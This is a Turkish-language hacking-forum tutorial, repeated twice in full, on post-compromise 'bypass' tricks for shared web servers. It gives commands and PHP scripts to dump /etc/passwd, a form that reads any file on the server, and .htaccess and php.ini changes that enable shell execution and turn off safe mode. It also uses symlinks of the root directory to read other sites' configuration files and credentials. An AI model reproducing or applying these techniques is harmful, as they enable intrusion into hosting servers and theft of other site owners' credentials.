Merhaba arkadaşlar hackerların cok sıklıkla kullandığı basit bypass yöntemlerinden bahsedeceğiz bugun sizlere
ilk olarak ilk kodumuz sudur :
1)etc/passwd bypass:
Aşağıdaki komutlar ile passwd leri okuyabilirsiniz :
PHP Kod:
1)cat /etc/passwd
2)cat -n /etc/passwd
3)ln s etc/passwd 1.txt
4)less /etc/passwd
5)more /etc/passwd
Evet bu kod ile okuyabiliyorsak ne mutlu bize ama bu kod gecersizse size 2 tane daha kod vereceğim onları deneyiniz ..
assagıda vereceğim kodları bir dosya oluşturup içine yazınız etc.php gibi
1. Kodumuz
PHP Kod:
<?php
// //cat /etc/passwd
for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "\n";
}
}
?>
Olmassa
2. Kodumuz
PHP Kod:
<font face="Times New Roman" size="4">Etc bypass</font><br />
<form method="POST" action="">
<p>
<input type="text" name="passwd" size="20">
<input type="submit" value="Get" name="B1">
</p>
</form>
<?
$sec = $_POST['passwd'];
if ($sec){
show_source ("$sec");
}
?>
Yukarıdakiler otomatik yolla yapılanlardır simdi manuele geçelim ..
"ln -s / root" komutu ile root klasörü yaratalım, içindeki kök dizinine girelim (cd root), sonra etc üyesi olalım (cd etc), ls komutu ile etc klasörünün içindekileri sıralayabiliriz bilərik.CgiTelnetdən "Downloand File" => file Name e passwd yada passwd.zip yazıp, kaydedin
2) Config bypass:
Config çekmek için bir klasör yaratıp, sırası ile => öncelikle .htaccess kuralım, içine aşağıdaki kodları yazıp, save edelim:
PHP Kod:
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .pl
AddHandler cgi-script .pl
AddHandler cgi-script .pl
Safe mode on ise , php.ini yaratıp, içine bu kodları girelim:
PHP Kod:
safe_mod = OFF
exec = ON
shell_exec = ON
Ve size gereken config çekme script: Config reader(Anti-armenia-TheLock) - Pastebin.com
Skripte chmod = 755 verip, içine passwd-ları dahil edip, çəkin.Configlər yarattığımız klasöre upload edilecektir.
3) symlink bypass:
Sunucuda symlink adlı klasör yaratalım, klasöre girip "ln -s / r00t (root)" emri verək.Həmin klasöre root adlı yeni klasör oluşacak, şimdi bir sitenin config-ini okuyalım:
sayt.com/symlink/root/home/istifadəçi/public_html/config-faylı.php
Bunu okuyunca biz Yasak (403) hatası alacağıq.İndi ise sembolik bağ adlı klasöre .htaccess dosyası açıp, içine aşağıdaki kodları yazıp, save edelim:
PHP Kod:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
ilk olarak ilk kodumuz sudur :
1)etc/passwd bypass:
Aşağıdaki komutlar ile passwd leri okuyabilirsiniz :
PHP Kod:
1)cat /etc/passwd
2)cat -n /etc/passwd
3)ln s etc/passwd 1.txt
4)less /etc/passwd
5)more /etc/passwd
Evet bu kod ile okuyabiliyorsak ne mutlu bize ama bu kod gecersizse size 2 tane daha kod vereceğim onları deneyiniz ..
assagıda vereceğim kodları bir dosya oluşturup içine yazınız etc.php gibi
1. Kodumuz
PHP Kod:
<?php
// //cat /etc/passwd
for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "\n";
}
}
?>
Olmassa
2. Kodumuz
PHP Kod:
<font face="Times New Roman" size="4">Etc bypass</font><br />
<form method="POST" action="">
<p>
<input type="text" name="passwd" size="20">
<input type="submit" value="Get" name="B1">
</p>
</form>
<?
$sec = $_POST['passwd'];
if ($sec){
show_source ("$sec");
}
?>
Yukarıdakiler otomatik yolla yapılanlardır simdi manuele geçelim ..
"ln -s / root" komutu ile root klasörü yaratalım, içindeki kök dizinine girelim (cd root), sonra etc üyesi olalım (cd etc), ls komutu ile etc klasörünün içindekileri sıralayabiliriz bilərik.CgiTelnetdən "Downloand File" => file Name e passwd yada passwd.zip yazıp, kaydedin
2) Config bypass:
Config çekmek için bir klasör yaratıp, sırası ile => öncelikle .htaccess kuralım, içine aşağıdaki kodları yazıp, save edelim:
PHP Kod:
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .pl
AddHandler cgi-script .pl
AddHandler cgi-script .pl
Safe mode on ise , php.ini yaratıp, içine bu kodları girelim:
PHP Kod:
safe_mod = OFF
exec = ON
shell_exec = ON
Ve size gereken config çekme script: Config reader(Anti-armenia-TheLock) - Pastebin.com
Skripte chmod = 755 verip, içine passwd-ları dahil edip, çəkin.Configlər yarattığımız klasöre upload edilecektir.
3) symlink bypass:
Sunucuda symlink adlı klasör yaratalım, klasöre girip "ln -s / r00t (root)" emri verək.Həmin klasöre root adlı yeni klasör oluşacak, şimdi bir sitenin config-ini okuyalım:
sayt.com/symlink/root/home/istifadəçi/public_html/config-faylı.php
Bunu okuyunca biz Yasak (403) hatası alacağıq.İndi ise sembolik bağ adlı klasöre .htaccess dosyası açıp, içine aşağıdaki kodları yazıp, save edelim:
PHP Kod:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any